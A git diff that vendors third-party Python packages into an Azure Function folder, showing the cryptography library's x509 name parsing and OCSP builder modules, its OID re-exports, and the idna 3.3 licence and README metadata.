NameOID.COUNTRY_NAME: "C", + NameOID.STREET_ADDRESS: "STREET", + NameOID.DOMAIN_COMPONENT: "DC", + NameOID.USER_ID: "UID", +} +_NAME_TO_NAMEOID = {v: k for k, v in _NAMEOID_TO_NAME.items()} + + +def _escape_dn_value(val: typing.Union[str, bytes]) -> str: + """Escape special characters in RFC4514 Distinguished Name value.""" + + if not val: + return "" + + # RFC 4514 Section 2.4 defines the value as being the # (U+0023) character + # followed by the hexadecimal encoding of the octets. + if isinstance(val, bytes): + return "#" + binascii.hexlify(val).decode("utf8") + + # See https://tools.ietf.org/html/rfc4514#section-2.4 + val = val.replace("\\", "\\\\") + val = val.replace('"', '\\"') + val = val.replace("+", "\\+") + val = val.replace(",", "\\,") + val = val.replace(";", "\\;") + val = val.replace("<", "\\<") + val = val.replace(">", "\\>") + val = val.replace("\0", "\\00") + + if val[0] in ("#", " "): + val = "\\" + val + if val[-1] == " ": + val = val[:-1] + "\\ " + + return val + + +def _unescape_dn_value(val: str) -> str: + if not val: + return "" + + # See https://tools.ietf.org/html/rfc4514#section-3 + + # special = escaped / SPACE / SHARP / EQUALS + # escaped = DQUOTE / PLUS / COMMA / SEMI / LANGLE / RANGLE + def sub(m): + val = m.group(1) + # Regular escape + if len(val) == 1: + return val + # Hex-value scape + return chr(int(val, 16)) + + return _RFC4514NameParser._PAIR_RE.sub(sub, val) + + +class NameAttribute: + def __init__( + self, + oid: ObjectIdentifier, + value: typing.Union[str, bytes], + _type: typing.Optional[_ASN1Type] = None, + *, + _validate: bool = True, + ) -> None: + if not isinstance(oid, ObjectIdentifier): + raise TypeError( + "oid argument must be an ObjectIdentifier instance." + ) + if _type == _ASN1Type.BitString: + if oid != NameOID.X500_UNIQUE_IDENTIFIER: + raise TypeError( + "oid must be X500_UNIQUE_IDENTIFIER for BitString type." + ) + if not isinstance(value, bytes): + raise TypeError("value must be bytes for BitString") + else: + if not isinstance(value, str): + raise TypeError("value argument must be a str") + + if ( + oid == NameOID.COUNTRY_NAME + or oid == NameOID.JURISDICTION_COUNTRY_NAME + ): + assert isinstance(value, str) + c_len = len(value.encode("utf8")) + if c_len != 2 and _validate is True: + raise ValueError( + "Country name must be a 2 character country code" + ) + elif c_len != 2: + warnings.warn( + "Country names should be two characters, but the " + "attribute is {} characters in length.".format(c_len), + stacklevel=2, + ) + + # The appropriate ASN1 string type varies by OID and is defined across + # multiple RFCs including 2459, 3280, and 5280. In general UTF8String + # is preferred (2459), but 3280 and 5280 specify several OIDs with + # alternate types. This means when we see the sentinel value we need + # to look up whether the OID has a non-UTF8 type. If it does, set it + # to that. Otherwise, UTF8! + if _type is None: + _type = _NAMEOID_DEFAULT_TYPE.get(oid, _ASN1Type.UTF8String) + + if not isinstance(_type, _ASN1Type): + raise TypeError("_type must be from the _ASN1Type enum") + + self._oid = oid + self._value = value + self._type = _type + + @property + def oid(self) -> ObjectIdentifier: + return self._oid + + @property + def value(self) -> typing.Union[str, bytes]: + return self._value + + @property + def rfc4514_attribute_name(self) -> str: + """ + The short attribute name (for example "CN") if available, + otherwise the OID dotted string. + """ + return _NAMEOID_TO_NAME.get(self.oid, self.oid.dotted_string) + + def rfc4514_string( + self, attr_name_overrides: typing.Optional[_OidNameMap] = None + ) -> str: + """ + Format as RFC4514 Distinguished Name string. + + Use short attribute name if available, otherwise fall back to OID + dotted string. + """ + attr_name = ( + attr_name_overrides.get(self.oid) if attr_name_overrides else None + ) + if attr_name is None: + attr_name = self.rfc4514_attribute_name + + return f"{attr_name}={_escape_dn_value(self.value)}" + + def __eq__(self, other: object) -> bool: + if not isinstance(other, NameAttribute): + return NotImplemented + + return self.oid == other.oid and self.value == other.value + + def __hash__(self) -> int: + return hash((self.oid, self.value)) + + def __repr__(self) -> str: + return "".format(self) + + +class RelativeDistinguishedName: + def __init__(self, attributes: typing.Iterable[NameAttribute]): + attributes = list(attributes) + if not attributes: + raise ValueError("a relative distinguished name cannot be empty") + if not all(isinstance(x, NameAttribute) for x in attributes): + raise TypeError("attributes must be an iterable of NameAttribute") + + # Keep list and frozenset to preserve attribute order where it matters + self._attributes = attributes + self._attribute_set = frozenset(attributes) + + if len(self._attribute_set) != len(attributes): + raise ValueError("duplicate attributes are not allowed") + + def get_attributes_for_oid( + self, oid: ObjectIdentifier + ) -> typing.List[NameAttribute]: + return [i for i in self if i.oid == oid] + + def rfc4514_string( + self, attr_name_overrides: typing.Optional[_OidNameMap] = None + ) -> str: + """ + Format as RFC4514 Distinguished Name string. + + Within each RDN, attributes are joined by '+', although that is rarely + used in certificates. + """ + return "+".join( + attr.rfc4514_string(attr_name_overrides) + for attr in self._attributes + ) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, RelativeDistinguishedName): + return NotImplemented + + return self._attribute_set == other._attribute_set + + def __hash__(self) -> int: + return hash(self._attribute_set) + + def __iter__(self) -> typing.Iterator[NameAttribute]: + return iter(self._attributes) + + def __len__(self) -> int: + return len(self._attributes) + + def __repr__(self) -> str: + return "".format(self.rfc4514_string()) + + +class Name: + @typing.overload + def __init__(self, attributes: typing.Iterable[NameAttribute]) -> None: + ... + + @typing.overload + def __init__( + self, attributes: typing.Iterable[RelativeDistinguishedName] + ) -> None: + ... + + def __init__( + self, + attributes: typing.Iterable[ + typing.Union[NameAttribute, RelativeDistinguishedName] + ], + ) -> None: + attributes = list(attributes) + if all(isinstance(x, NameAttribute) for x in attributes): + self._attributes = [ + RelativeDistinguishedName([typing.cast(NameAttribute, x)]) + for x in attributes + ] + elif all(isinstance(x, RelativeDistinguishedName) for x in attributes): + self._attributes = typing.cast( + typing.List[RelativeDistinguishedName], attributes + ) + else: + raise TypeError( + "attributes must be a list of NameAttribute" + " or a list RelativeDistinguishedName" + ) + + @classmethod + def from_rfc4514_string(cls, data: str) -> "Name": + return _RFC4514NameParser(data).parse() + + def rfc4514_string( + self, attr_name_overrides: typing.Optional[_OidNameMap] = None + ) -> str: + """ + Format as RFC4514 Distinguished Name string. + For example 'CN=foobar.com,O=Foo Corp,C=US' + + An X.509 name is a two-level structure: a list of sets of attributes. + Each list element is separated by ',' and within each list element, set + elements are separated by '+'. The latter is almost never used in + real world certificates. According to RFC4514 section 2.1 the + RDNSequence must be reversed when converting to string representation. + """ + return ",".join( + attr.rfc4514_string(attr_name_overrides) + for attr in reversed(self._attributes) + ) + + def get_attributes_for_oid( + self, oid: ObjectIdentifier + ) -> typing.List[NameAttribute]: + return [i for i in self if i.oid == oid] + + @property + def rdns(self) -> typing.List[RelativeDistinguishedName]: + return self._attributes + + def public_bytes(self, backend: typing.Any = None) -> bytes: + return rust_x509.encode_name_bytes(self) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, Name): + return NotImplemented + + return self._attributes == other._attributes + + def __hash__(self) -> int: + # TODO: this is relatively expensive, if this looks like a bottleneck + # for you, consider optimizing! + return hash(tuple(self._attributes)) + + def __iter__(self) -> typing.Iterator[NameAttribute]: + for rdn in self._attributes: + for ava in rdn: + yield ava + + def __len__(self) -> int: + return sum(len(rdn) for rdn in self._attributes) + + def __repr__(self) -> str: + rdns = ",".join(attr.rfc4514_string() for attr in self._attributes) + return "".format(rdns) + + +class _RFC4514NameParser: + _OID_RE = re.compile(r"(0|([1-9]\d*))(\.(0|([1-9]\d*)))+") + _DESCR_RE = re.compile(r"[a-zA-Z][a-zA-Z\d-]*") + + _PAIR = r"\\([\\ #=\"\+,;<>]|[\da-zA-Z]{2})" + _PAIR_RE = re.compile(_PAIR) + _LUTF1 = r"[\x01-\x1f\x21\x24-\x2A\x2D-\x3A\x3D\x3F-\x5B\x5D-\x7F]" + _SUTF1 = r"[\x01-\x21\x23-\x2A\x2D-\x3A\x3D\x3F-\x5B\x5D-\x7F]" + _TUTF1 = r"[\x01-\x1F\x21\x23-\x2A\x2D-\x3A\x3D\x3F-\x5B\x5D-\x7F]" + _UTFMB = rf"[\x80-{chr(sys.maxunicode)}]" + _LEADCHAR = rf"{_LUTF1}|{_UTFMB}" + _STRINGCHAR = rf"{_SUTF1}|{_UTFMB}" + _TRAILCHAR = rf"{_TUTF1}|{_UTFMB}" + _STRING_RE = re.compile( + rf""" + ( + ({_LEADCHAR}|{_PAIR}) + ( + ({_STRINGCHAR}|{_PAIR})* + ({_TRAILCHAR}|{_PAIR}) + )? + )? + """, + re.VERBOSE, + ) + _HEXSTRING_RE = re.compile(r"#([\da-zA-Z]{2})+") + + def __init__(self, data: str) -> None: + self._data = data + self._idx = 0 + + def _has_data(self) -> bool: + return self._idx < len(self._data) + + def _peek(self) -> typing.Optional[str]: + if self._has_data(): + return self._data[self._idx] + return None + + def _read_char(self, ch: str) -> None: + if self._peek() != ch: + raise ValueError + self._idx += 1 + + def _read_re(self, pat) -> str: + match = pat.match(self._data, pos=self._idx) + if match is None: + raise ValueError + val = match.group() + self._idx += len(val) + return val + + def parse(self) -> Name: + rdns = [self._parse_rdn()] + + while self._has_data(): + self._read_char(",") + rdns.append(self._parse_rdn()) + + return Name(rdns) + + def _parse_rdn(self) -> RelativeDistinguishedName: + nas = [self._parse_na()] + while self._peek() == "+": + self._read_char("+") + nas.append(self._parse_na()) + + return RelativeDistinguishedName(nas) + + def _parse_na(self) -> NameAttribute: + try: + oid_value = self._read_re(self._OID_RE) + except ValueError: + name = self._read_re(self._DESCR_RE) + oid = _NAME_TO_NAMEOID.get(name) + if oid is None: + raise ValueError + else: + oid = ObjectIdentifier(oid_value) + + self._read_char("=") + if self._peek() == "#": + value = self._read_re(self._HEXSTRING_RE) + value = binascii.unhexlify(value[1:]).decode() + else: + raw_value = self._read_re(self._STRING_RE) + value = _unescape_dn_value(raw_value) + + return NameAttribute(oid, value) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/ocsp.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/ocsp.py new file mode 100644 index 0000000..ff7f1d6 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/ocsp.py @@ -0,0 +1,551 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc +import datetime +import typing + +from cryptography import utils +from cryptography import x509 +from cryptography.hazmat.bindings._rust import ocsp +from cryptography.hazmat.primitives import hashes, serialization +from cryptography.hazmat.primitives.asymmetric.types import ( + CERTIFICATE_PRIVATE_KEY_TYPES, +) +from cryptography.x509.base import ( + _EARLIEST_UTC_TIME, + _convert_to_naive_utc_time, + _reject_duplicate_extension, +) + + +class OCSPResponderEncoding(utils.Enum): + HASH = "By Hash" + NAME = "By Name" + + +class OCSPResponseStatus(utils.Enum): + SUCCESSFUL = 0 + MALFORMED_REQUEST = 1 + INTERNAL_ERROR = 2 + TRY_LATER = 3 + SIG_REQUIRED = 5 + UNAUTHORIZED = 6 + + +_ALLOWED_HASHES = ( + hashes.SHA1, + hashes.SHA224, + hashes.SHA256, + hashes.SHA384, + hashes.SHA512, +) + + +def _verify_algorithm(algorithm: hashes.HashAlgorithm) -> None: + if not isinstance(algorithm, _ALLOWED_HASHES): + raise ValueError( + "Algorithm must be SHA1, SHA224, SHA256, SHA384, or SHA512" + ) + + +class OCSPCertStatus(utils.Enum): + GOOD = 0 + REVOKED = 1 + UNKNOWN = 2 + + +class _SingleResponse: + def __init__( + self, + cert: x509.Certificate, + issuer: x509.Certificate, + algorithm: hashes.HashAlgorithm, + cert_status: OCSPCertStatus, + this_update: datetime.datetime, + next_update: typing.Optional[datetime.datetime], + revocation_time: typing.Optional[datetime.datetime], + revocation_reason: typing.Optional[x509.ReasonFlags], + ): + if not isinstance(cert, x509.Certificate) or not isinstance( + issuer, x509.Certificate + ): + raise TypeError("cert and issuer must be a Certificate") + + _verify_algorithm(algorithm) + if not isinstance(this_update, datetime.datetime): + raise TypeError("this_update must be a datetime object") + if next_update is not None and not isinstance( + next_update, datetime.datetime + ): + raise TypeError("next_update must be a datetime object or None") + + self._cert = cert + self._issuer = issuer + self._algorithm = algorithm + self._this_update = this_update + self._next_update = next_update + + if not isinstance(cert_status, OCSPCertStatus): + raise TypeError( + "cert_status must be an item from the OCSPCertStatus enum" + ) + if cert_status is not OCSPCertStatus.REVOKED: + if revocation_time is not None: + raise ValueError( + "revocation_time can only be provided if the certificate " + "is revoked" + ) + if revocation_reason is not None: + raise ValueError( + "revocation_reason can only be provided if the certificate" + " is revoked" + ) + else: + if not isinstance(revocation_time, datetime.datetime): + raise TypeError("revocation_time must be a datetime object") + + revocation_time = _convert_to_naive_utc_time(revocation_time) + if revocation_time < _EARLIEST_UTC_TIME: + raise ValueError( + "The revocation_time must be on or after" + " 1950 January 1." + ) + + if revocation_reason is not None and not isinstance( + revocation_reason, x509.ReasonFlags + ): + raise TypeError( + "revocation_reason must be an item from the ReasonFlags " + "enum or None" + ) + + self._cert_status = cert_status + self._revocation_time = revocation_time + self._revocation_reason = revocation_reason + + +class OCSPRequest(metaclass=abc.ABCMeta): + @abc.abstractproperty + def issuer_key_hash(self) -> bytes: + """ + The hash of the issuer public key + """ + + @abc.abstractproperty + def issuer_name_hash(self) -> bytes: + """ + The hash of the issuer name + """ + + @abc.abstractproperty + def hash_algorithm(self) -> hashes.HashAlgorithm: + """ + The hash algorithm used in the issuer name and key hashes + """ + + @abc.abstractproperty + def serial_number(self) -> int: + """ + The serial number of the cert whose status is being checked + """ + + @abc.abstractmethod + def public_bytes(self, encoding: serialization.Encoding) -> bytes: + """ + Serializes the request to DER + """ + + @abc.abstractproperty + def extensions(self) -> x509.Extensions: + """ + The list of request extensions. Not single request extensions. + """ + + +class OCSPSingleResponse(metaclass=abc.ABCMeta): + @abc.abstractproperty + def certificate_status(self) -> OCSPCertStatus: + """ + The status of the certificate (an element from the OCSPCertStatus enum) + """ + + @abc.abstractproperty + def revocation_time(self) -> typing.Optional[datetime.datetime]: + """ + The date of when the certificate was revoked or None if not + revoked. + """ + + @abc.abstractproperty + def revocation_reason(self) -> typing.Optional[x509.ReasonFlags]: + """ + The reason the certificate was revoked or None if not specified or + not revoked. + """ + + @abc.abstractproperty + def this_update(self) -> datetime.datetime: + """ + The most recent time at which the status being indicated is known by + the responder to have been correct + """ + + @abc.abstractproperty + def next_update(self) -> typing.Optional[datetime.datetime]: + """ + The time when newer information will be available + """ + + @abc.abstractproperty + def issuer_key_hash(self) -> bytes: + """ + The hash of the issuer public key + """ + + @abc.abstractproperty + def issuer_name_hash(self) -> bytes: + """ + The hash of the issuer name + """ + + @abc.abstractproperty + def hash_algorithm(self) -> hashes.HashAlgorithm: + """ + The hash algorithm used in the issuer name and key hashes + """ + + @abc.abstractproperty + def serial_number(self) -> int: + """ + The serial number of the cert whose status is being checked + """ + + +class OCSPResponse(metaclass=abc.ABCMeta): + @abc.abstractproperty + def responses(self) -> typing.Iterator[OCSPSingleResponse]: + """ + An iterator over the individual SINGLERESP structures in the + response + """ + + @abc.abstractproperty + def response_status(self) -> OCSPResponseStatus: + """ + The status of the response. This is a value from the OCSPResponseStatus + enumeration + """ + + @abc.abstractproperty + def signature_algorithm_oid(self) -> x509.ObjectIdentifier: + """ + The ObjectIdentifier of the signature algorithm + """ + + @abc.abstractproperty + def signature_hash_algorithm( + self, + ) -> typing.Optional[hashes.HashAlgorithm]: + """ + Returns a HashAlgorithm corresponding to the type of the digest signed + """ + + @abc.abstractproperty + def signature(self) -> bytes: + """ + The signature bytes + """ + + @abc.abstractproperty + def tbs_response_bytes(self) -> bytes: + """ + The tbsResponseData bytes + """ + + @abc.abstractproperty + def certificates(self) -> typing.List[x509.Certificate]: + """ + A list of certificates used to help build a chain to verify the OCSP + response. This situation occurs when the OCSP responder uses a delegate + certificate. + """ + + @abc.abstractproperty + def responder_key_hash(self) -> typing.Optional[bytes]: + """ + The responder's key hash or None + """ + + @abc.abstractproperty + def responder_name(self) -> typing.Optional[x509.Name]: + """ + The responder's Name or None + """ + + @abc.abstractproperty + def produced_at(self) -> datetime.datetime: + """ + The time the response was produced + """ + + @abc.abstractproperty + def certificate_status(self) -> OCSPCertStatus: + """ + The status of the certificate (an element from the OCSPCertStatus enum) + """ + + @abc.abstractproperty + def revocation_time(self) -> typing.Optional[datetime.datetime]: + """ + The date of when the certificate was revoked or None if not + revoked. + """ + + @abc.abstractproperty + def revocation_reason(self) -> typing.Optional[x509.ReasonFlags]: + """ + The reason the certificate was revoked or None if not specified or + not revoked. + """ + + @abc.abstractproperty + def this_update(self) -> datetime.datetime: + """ + The most recent time at which the status being indicated is known by + the responder to have been correct + """ + + @abc.abstractproperty + def next_update(self) -> typing.Optional[datetime.datetime]: + """ + The time when newer information will be available + """ + + @abc.abstractproperty + def issuer_key_hash(self) -> bytes: + """ + The hash of the issuer public key + """ + + @abc.abstractproperty + def issuer_name_hash(self) -> bytes: + """ + The hash of the issuer name + """ + + @abc.abstractproperty + def hash_algorithm(self) -> hashes.HashAlgorithm: + """ + The hash algorithm used in the issuer name and key hashes + """ + + @abc.abstractproperty + def serial_number(self) -> int: + """ + The serial number of the cert whose status is being checked + """ + + @abc.abstractproperty + def extensions(self) -> x509.Extensions: + """ + The list of response extensions. Not single response extensions. + """ + + @abc.abstractproperty + def single_extensions(self) -> x509.Extensions: + """ + The list of single response extensions. Not response extensions. + """ + + @abc.abstractmethod + def public_bytes(self, encoding: serialization.Encoding) -> bytes: + """ + Serializes the response to DER + """ + + +class OCSPRequestBuilder: + def __init__( + self, + request: typing.Optional[ + typing.Tuple[ + x509.Certificate, x509.Certificate, hashes.HashAlgorithm + ] + ] = None, + extensions: typing.List[x509.Extension[x509.ExtensionType]] = [], + ) -> None: + self._request = request + self._extensions = extensions + + def add_certificate( + self, + cert: x509.Certificate, + issuer: x509.Certificate, + algorithm: hashes.HashAlgorithm, + ) -> "OCSPRequestBuilder": + if self._request is not None: + raise ValueError("Only one certificate can be added to a request") + + _verify_algorithm(algorithm) + if not isinstance(cert, x509.Certificate) or not isinstance( + issuer, x509.Certificate + ): + raise TypeError("cert and issuer must be a Certificate") + + return OCSPRequestBuilder((cert, issuer, algorithm), self._extensions) + + def add_extension( + self, extval: x509.ExtensionType, critical: bool + ) -> "OCSPRequestBuilder": + if not isinstance(extval, x509.ExtensionType): + raise TypeError("extension must be an ExtensionType") + + extension = x509.Extension(extval.oid, critical, extval) + _reject_duplicate_extension(extension, self._extensions) + + return OCSPRequestBuilder( + self._request, self._extensions + [extension] + ) + + def build(self) -> OCSPRequest: + if self._request is None: + raise ValueError("You must add a certificate before building") + + return ocsp.create_ocsp_request(self) + + +class OCSPResponseBuilder: + def __init__( + self, + response: typing.Optional[_SingleResponse] = None, + responder_id: typing.Optional[ + typing.Tuple[x509.Certificate, OCSPResponderEncoding] + ] = None, + certs: typing.Optional[typing.List[x509.Certificate]] = None, + extensions: typing.List[x509.Extension[x509.ExtensionType]] = [], + ): + self._response = response + self._responder_id = responder_id + self._certs = certs + self._extensions = extensions + + def add_response( + self, + cert: x509.Certificate, + issuer: x509.Certificate, + algorithm: hashes.HashAlgorithm, + cert_status: OCSPCertStatus, + this_update: datetime.datetime, + next_update: typing.Optional[datetime.datetime], + revocation_time: typing.Optional[datetime.datetime], + revocation_reason: typing.Optional[x509.ReasonFlags], + ) -> "OCSPResponseBuilder": + if self._response is not None: + raise ValueError("Only one response per OCSPResponse.") + + singleresp = _SingleResponse( + cert, + issuer, + algorithm, + cert_status, + this_update, + next_update, + revocation_time, + revocation_reason, + ) + return OCSPResponseBuilder( + singleresp, + self._responder_id, + self._certs, + self._extensions, + ) + + def responder_id( + self, encoding: OCSPResponderEncoding, responder_cert: x509.Certificate + ) -> "OCSPResponseBuilder": + if self._responder_id is not None: + raise ValueError("responder_id can only be set once") + if not isinstance(responder_cert, x509.Certificate): + raise TypeError("responder_cert must be a Certificate") + if not isinstance(encoding, OCSPResponderEncoding): + raise TypeError( + "encoding must be an element from OCSPResponderEncoding" + ) + + return OCSPResponseBuilder( + self._response, + (responder_cert, encoding), + self._certs, + self._extensions, + ) + + def certificates( + self, certs: typing.Iterable[x509.Certificate] + ) -> "OCSPResponseBuilder": + if self._certs is not None: + raise ValueError("certificates may only be set once") + certs = list(certs) + if len(certs) == 0: + raise ValueError("certs must not be an empty list") + if not all(isinstance(x, x509.Certificate) for x in certs): + raise TypeError("certs must be a list of Certificates") + return OCSPResponseBuilder( + self._response, + self._responder_id, + certs, + self._extensions, + ) + + def add_extension( + self, extval: x509.ExtensionType, critical: bool + ) -> "OCSPResponseBuilder": + if not isinstance(extval, x509.ExtensionType): + raise TypeError("extension must be an ExtensionType") + + extension = x509.Extension(extval.oid, critical, extval) + _reject_duplicate_extension(extension, self._extensions) + + return OCSPResponseBuilder( + self._response, + self._responder_id, + self._certs, + self._extensions + [extension], + ) + + def sign( + self, + private_key: CERTIFICATE_PRIVATE_KEY_TYPES, + algorithm: typing.Optional[hashes.HashAlgorithm], + ) -> OCSPResponse: + if self._response is None: + raise ValueError("You must add a response before signing") + if self._responder_id is None: + raise ValueError("You must add a responder_id before signing") + + return ocsp.create_ocsp_response( + OCSPResponseStatus.SUCCESSFUL, self, private_key, algorithm + ) + + @classmethod + def build_unsuccessful( + cls, response_status: OCSPResponseStatus + ) -> OCSPResponse: + if not isinstance(response_status, OCSPResponseStatus): + raise TypeError( + "response_status must be an item from OCSPResponseStatus" + ) + if response_status is OCSPResponseStatus.SUCCESSFUL: + raise ValueError("response_status cannot be SUCCESSFUL") + + return ocsp.create_ocsp_response(response_status, None, None, None) + + +def load_der_ocsp_request(data: bytes) -> OCSPRequest: + return ocsp.load_der_ocsp_request(data) + + +def load_der_ocsp_response(data: bytes) -> OCSPResponse: + return ocsp.load_der_ocsp_response(data) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/oid.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/oid.py new file mode 100644 index 0000000..73130c7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/oid.py @@ -0,0 +1,32 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +from cryptography.hazmat._oid import ( + AttributeOID, + AuthorityInformationAccessOID, + CRLEntryExtensionOID, + CertificatePoliciesOID, + ExtendedKeyUsageOID, + ExtensionOID, + NameOID, + OCSPExtensionOID, + ObjectIdentifier, + SignatureAlgorithmOID, + SubjectInformationAccessOID, +) + + +__all__ = [ + "AttributeOID", + "AuthorityInformationAccessOID", + "CRLEntryExtensionOID", + "CertificatePoliciesOID", + "ExtendedKeyUsageOID", + "ExtensionOID", + "NameOID", + "OCSPExtensionOID", + "ObjectIdentifier", + "SignatureAlgorithmOID", + "SubjectInformationAccessOID", +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/LICENSE.md b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/LICENSE.md new file mode 100644 index 0000000..ab1e1b2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/LICENSE.md @@ -0,0 +1,29 @@ +BSD 3-Clause License + +Copyright (c) 2013-2021, Kim Davies +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/METADATA new file mode 100644 index 0000000..21ce53a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/METADATA @@ -0,0 +1,236 @@ +Metadata-Version: 2.1 +Name: idna +Version: 3.3 +Summary: Internationalized Domain Names in Applications (IDNA) +Home-page: https://github.com/kjd/idna +Author: Kim Davies +Author-email: kim@cynosure.com.au +License: BSD-3-Clause +Platform: UNKNOWN +Classifier: Development Status :: 5 - Production/Stable +Classifier: Intended Audience :: Developers +Classifier: Intended Audience :: System Administrators +Classifier: License :: OSI Approved :: BSD License +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3.5 +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: Implementation :: CPython +Classifier: Programming Language :: Python :: Implementation :: PyPy +Classifier: Topic :: Internet :: Name Service (DNS) +Classifier: Topic :: Software Development :: Libraries :: Python Modules +Classifier: Topic :: Utilities +Requires-Python: >=3.5 +License-File: LICENSE.md + +Internationalized Domain Names in Applications (IDNA) +===================================================== + +Support for the Internationalised Domain Names in Applications +(IDNA) protocol as specified in `RFC 5891 `_. +This is the latest version of the protocol and is sometimes referred to as +“IDNA 2008”. + +This library also provides support for Unicode Technical Standard 46, +`Unicode IDNA Compatibility Processing `_. + +This acts as a suitable replacement for the “encodings.idna” module that +comes with the Python standard library, but which only supports the +older superseded IDNA specification (`RFC 3490 `_). + +Basic functions are simply executed: + +.. code-block:: pycon + + >>> import idna + >>> idna.encode('ドメイン.テスト') + b'xn--eckwd4c7c.xn--zckzah' + >>> print(idna.decode('xn--eckwd4c7c.xn--zckzah')) + ドメイン.テスト + + +Installation +------------ + +To install this library, you can use pip: + +.. code-block:: bash + + $ pip install idna + +Alternatively, you can install the package using the bundled setup script: + +.. code-block:: bash + + $ python setup.py install + + +Usage +----- + +For typical usage, the ``encode`` and ``decode`` functions will take a domain +name argument and perform a conversion to A-labels or U-labels respectively. + +.. code-block:: pycon + + >>> import idna + >>> idna.encode('ドメイン.テスト') + b'xn--eckwd4c7c.xn--zckzah' + >>> print(idna.decode('xn--eckwd4c7c.xn--zckzah')) + ドメイン.テスト + +You may use the codec encoding and decoding methods using the +``idna.codec`` module: + +.. code-block:: pycon + + >>> import idna.codec + >>> print('домен.испытание'.encode('idna')) + b'xn--d1acufc.xn--80akhbyknj4f' + >>> print(b'xn--d1acufc.xn--80akhbyknj4f'.decode('idna')) + домен.испытание + +Conversions can be applied at a per-label basis using the ``ulabel`` or ``alabel`` +functions if necessary: + +.. code-block:: pycon + + >>> idna.alabel('测试') + b'xn--0zwm56d' + +Compatibility Mapping (UTS #46) ++++++++++++++++++++++++++++++++ + +As described in `RFC 5895 `_, the IDNA +specification does not normalize input from different potential ways a user +may input a domain name. This functionality, known as a “mapping”, is +considered by the specification to be a local user-interface issue distinct +from IDNA conversion functionality. + +This library provides one such mapping, that was developed by the Unicode +Consortium. Known as `Unicode IDNA Compatibility Processing `_, +it provides for both a regular mapping for typical applications, as well as +a transitional mapping to help migrate from older IDNA 2003 applications. + +For example, “Königsgäßchen” is not a permissible label as *LATIN CAPITAL +LETTER K* is not allowed (nor are capital letters in general). UTS 46 will +convert this into lower case prior to applying the IDNA conversion. + +.. code-block:: pycon + + >>> import idna + >>> idna.encode('Königsgäßchen') + ... + idna.core.InvalidCodepoint: Codepoint U+004B at position 1 of 'Königsgäßchen' not allowed + >>> idna.encode('Königsgäßchen', uts46=True) + b'xn--knigsgchen-b4a3dun' + >>> print(idna.decode('xn--knigsgchen-b4a3dun')) + königsgäßchen + +Transitional processing provides conversions to help transition from the older +2003 standard to the current standard. For example, in the original IDNA +specification, the *LATIN SMALL LETTER SHARP S* (ß) was converted into two +*LATIN SMALL LETTER S* (ss), whereas in the current IDNA specification this +conversion is not performed. + +.. code-block:: pycon + + >>> idna.encode('Königsgäßchen', uts46=True, transitional=True) + 'xn--knigsgsschen-lcb0w' + +Implementors should use transitional processing with caution, only in rare +cases where conversion from legacy labels to current labels must be performed +(i.e. IDNA implementations that pre-date 2008). For typical applications +that just need to convert labels, transitional processing is unlikely to be +beneficial and could 